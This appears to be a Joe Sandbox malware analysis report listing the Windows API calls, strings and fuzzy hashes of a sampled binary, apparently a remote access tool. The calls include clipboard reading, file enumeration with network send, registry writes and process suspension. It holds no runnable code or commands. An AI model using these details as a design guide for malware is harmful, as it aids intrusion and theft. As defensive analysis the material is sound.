                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: ACP$OCP
                                          • API String ID: 2299586839-711371036
                                          • Opcode ID: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction ID: 097c3b5166b2d36aca1cb621bb06e922528e2ea4561953c90108b9915aa2a338
                                          • Opcode Fuzzy Hash: 61c68c86ee519c97ea86d50e82dd2762e668b1fdc7e44e8e256cfbf4b452970f
                                          • Instruction Fuzzy Hash: 7E21F932600108B6D734CF14CA10A9B73A6EB16B53B564467ED09D7312F7B6DD44C398
                                          APIs
                                          • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00407892
                                          • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 0040795A
                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FileFind$FirstNextsend
                                          • String ID: 8eF$hPG$hPG
                                          • API String ID: 4113138495-2076665626
                                          • Opcode ID: a6c9c9649a55c42556727ff727ad14387c41d165ee427d48925338df36ff0517
                                          • Instruction ID: abfa5a3658aec55442980c0effbd4670719d50d4d7308f226e3cac976b3f196c
                                          • Opcode Fuzzy Hash: a6c9c9649a55c42556727ff727ad14387c41d165ee427d48925338df36ff0517
                                          • Instruction Fuzzy Hash: CB2195315082019BC314FB61D895CEFB3ACAF90358F40493EF696620E1FF78AA09C65B
                                          APIs
                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CB68
                                            • Part of subcall function 004137AA: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004137B9
                                            • Part of subcall function 004137AA: RegSetValueExA.KERNEL32(?,004674C8,00000000,?,00000000,00000000,00475300,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137E1
                                            • Part of subcall function 004137AA: RegCloseKey.KERNEL32(?,?,?,0040F88E,004674C8,5.2.0 Pro), ref: 004137EC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseCreateInfoParametersSystemValue
                                          • String ID: ,aF$Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                          • API String ID: 4127273184-3126330168
                                          • Opcode ID: 1dafd4e115d1579546cfd655b47399d1506d96e03fc201f2c1b7b85ae65ff372
                                          • Instruction ID: 8ac436d711b2fc3476497f69dc57c3b9a547a247a31514f467319d0910454585
                                          • Opcode Fuzzy Hash: 1dafd4e115d1579546cfd655b47399d1506d96e03fc201f2c1b7b85ae65ff372
                                          • Instruction Fuzzy Hash: D7118472BC425022E81831396D9BFBE28068343F61F54456BF6022A6CAE4CF6A9143CF
                                          APIs
                                          • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041B54A
                                          • LoadResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B55E
                                          • LockResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B565
                                          • SizeofResource.KERNEL32(00000000,?,?,0040F419,00000000), ref: 0041B574
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Resource$FindLoadLockSizeof
                                          • String ID: SETTINGS
                                          • API String ID: 3473537107-594951305
                                          • Opcode ID: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                          • Instruction ID: e87eb13c1a863bb520e8110b03cd0e44f0123e9e346c2db4eb51eb31bea7c0b5
                                          • Opcode Fuzzy Hash: 7e39093ddf5dcb720cd3caccf1e1277dc2c4d9143844da5a4d70bf483eb1c798
                                          • Instruction Fuzzy Hash: 23E01276600B21EBDB211FB1AC8CD467F25E7C9B533140075FA0582271CB758840DA58
                                          APIs
                                          • __EH_prolog.LIBCMT ref: 004096A5
                                          • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 0040971D
                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00409746
                                          • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 0040975D
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Find$File$CloseFirstH_prologNext
                                          • String ID:
                                          • API String ID: 1157919129-0
                                          • Opcode ID: 5e708330bfbdb9036aa787329a800d88489fa4c70442028eebd1807c100a849e
                                          • Instruction ID: 095255599cc0af9be2c5710cd9f248f54336688560ad7ccdcde9a73cf5c292f5
                                          • Opcode Fuzzy Hash: 5e708330bfbdb9036aa787329a800d88489fa4c70442028eebd1807c100a849e
                                          • Instruction Fuzzy Hash: CB813C729001099BCB15EBA2DC969EDB378AF14318F10417FE506B71E2EF789E49CB58
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00444AF4,?,?,?,?,?,?,00000004), ref: 00451E3A
                                          • _wcschr.LIBVCRUNTIME ref: 00451ECA
                                          • _wcschr.LIBVCRUNTIME ref: 00451ED8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00444AF4,00000000,00444C14), ref: 00451F7B
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                          • String ID:
                                          • API String ID: 4212172061-0
                                          • Opcode ID: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction ID: 2c98265d6c7a89d72caae9d33925a6d6107158c78f730362dcab12f0c71d6669
                                          • Opcode Fuzzy Hash: 542ab58a55aa9f08c463a9389d0e41dfe4354c1e35855495671bf6e32f2bde7c
                                          • Instruction Fuzzy Hash: 7F611976600606AAD714AB75CC42FBB73A8EF04306F14056FFD05DB292EB78E948C769
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452143,00000001,00000000,?,JD,?,00452770,00000000,?,?,?), ref: 0045208D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: p'E$JD
                                          • API String ID: 1084509184-908320845
                                          • Opcode ID: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction ID: b0e9e6415e7ea3a3ed95e939ef0edb9d062384d4a1a0bde9f31cc9ceae225fa6
                                          • Opcode Fuzzy Hash: 475d6d5c58d7186cd22417851423cdf86cfe6bc0717def2965f4a7021c27fb53
                                          • Instruction Fuzzy Hash: 0211553A2007019FDB189F39C9916BBBB92FF8075AB14482EEE4687B41D7B5A946C740
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482F4
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452197
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004521E8
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004522A8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                          • String ID:
                                          • API String ID: 2829624132-0
                                          • Opcode ID: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction ID: 283aa9570716a6929da4b93cb0bca45b8c77d553a5ebfd19e37a994bad1de6ac
                                          • Opcode Fuzzy Hash: 1ce7e7c7dfcd5f502045176aa51a1e3ace1f8c45826c3dbb4c0c9878229dab74
                                          • Instruction Fuzzy Hash: F361A235500207ABDF289F24CE82B7A77A8EF05306F1441BBED05C6656E7BC9D89CB58
                                          APIs
                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC69
                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC73
                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC80
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                          • String ID:
                                          • API String ID: 3906539128-0
                                          • Opcode ID: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction ID: 25e88f5a56b9fbea854716c485460a06fbe33a825339a9765be54c88dd7cea35
                                          • Opcode Fuzzy Hash: 1e0b73e88f7870ac8a7e49df57248e9339733cda2bb7518ac33a0b9eb889d704
                                          • Instruction Fuzzy Hash: 0431D374901218ABCB21DF65D9887CDBBB8EF0C311F5051EAE81CA7251EB749F818F48
                                          APIs
                                          • GetCurrentProcess.KERNEL32(?,?,0044332B,?), ref: 00443376
                                          • TerminateProcess.KERNEL32(00000000,?,0044332B,?), ref: 0044337D
                                          • ExitProcess.KERNEL32 ref: 0044338F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CurrentExitTerminate
                                          • String ID:
                                          • API String ID: 1703294689-0
                                          • Opcode ID: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction ID: 4b22f3a5ffe79ca7dfb81d814e561f82a31e4bef9a776fe0bb9daccb8e878f4b
                                          • Opcode Fuzzy Hash: 4e3b9aa1e9039f050651c305726e439f17232b6e89e74059b12d513dd76054c6
                                          • Instruction Fuzzy Hash: 9FE0B635401608FBDF11AF55DE09A5D3BAAEB40B56F005469FC498A272CF79EE42CB88
                                          APIs
                                          • OpenClipboard.USER32(00000000), ref: 0040B74C
                                          • GetClipboardData.USER32(0000000D), ref: 0040B758
                                          • CloseClipboard.USER32 ref: 0040B760
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Clipboard$CloseDataOpen
                                          • String ID:
                                          • API String ID: 2058664381-0
                                          • Opcode ID: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction ID: 1c65eecdd0087a0ffd0b0a04a5b63b9ff0c479b34dfa65f2e767e94bdce73387
                                          • Opcode Fuzzy Hash: ee7560bd864c47a473b03ccd03fab4bf0c670c3a92a751b3696d255e79ff2f15
                                          • Instruction Fuzzy Hash: 45E0EC31745320EFC3206B609C49F9B6AA4DF85B52F05443AB905BB2E5DB78CC4086AD
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041605F,00000000), ref: 0041BBD1
                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BBDE
                                          • CloseHandle.KERNEL32(00000000,?,?,0041605F,00000000), ref: 0041BBE7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenResume
                                          • String ID:
                                          • API String ID: 3614150671-0
                                          • Opcode ID: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction ID: dbaabbb0ea2570487ff62d8cf89bd30b477e7113d13ca21b8680662729a76e86
                                          • Opcode Fuzzy Hash: dd0b989ddcc61b84e262834eab0f6eafaf8d61dce4d0b86b08aa1b4c832549dd
                                          • Instruction Fuzzy Hash: 66D05E36204121E3C320176A7C0CD97AD68DBC5AA2705412AF804C26649A60CC0186E4
                                          APIs
                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,0041603A,00000000), ref: 0041BBA5
                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BBB2
                                          • CloseHandle.KERNEL32(00000000,?,?,0041603A,00000000), ref: 0041BBBB
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process$CloseHandleOpenSuspend
                                          • String ID:
                                          • API String ID: 1999457699-0
                                          • Opcode ID: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                          • Instruction ID: 1e4755145751be78863ec26184204985b99a3e1fec7ed1e2fa2d7a7f5aac3163
                                          • Opcode Fuzzy Hash: 15699d522662e94a36dc9f627e6c03bf4f255e4023340f214c75571920ff47a0
                                          • Instruction Fuzzy Hash: 73D05E36104121E3C6211B6A7C0CD97AD68DFC5AA2705412AF904D26509A20CC0186E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: .
                                          • API String ID: 0-248832578
                                          • Opcode ID: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction ID: 7baa6cf80f4bdea99dbc4d330b45aada8194c6230f36d830dc1b60d3871032d3
                                          • Opcode Fuzzy Hash: e4ba95ef050ff9873834a062f40f8bfe8ca2f849e5d953d5b04f24550caf4fd0
                                          • Instruction Fuzzy Hash: DF3107B1900259AFEB24DE7ACC84EFB7BBDEB46318F0401AEF41897291E6349D418B54
                                          APIs
                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                          • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID: JD
                                          • API String ID: 1084509184-2669065882
                                          • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                          • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                          • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                          APIs
                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004489C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID: GetLocaleInfoEx
                                          • API String ID: 2299586839-2904428671
                                          • Opcode ID: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                          • Instruction ID: 58f0578312c774904006f9ed4749830948a62bec6dc8fde4d932476f73229d15
                                          • Opcode Fuzzy Hash: 53574c2ecf56bfb558b2c309ca3eb91f9c7a0a18e0f2245662e0b0bedf18becb
                                          • Instruction Fuzzy Hash: C0F0F631640608FBDB016F61DC06F6E7B25EB04751F00056EFC0966251DE368D2096DE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
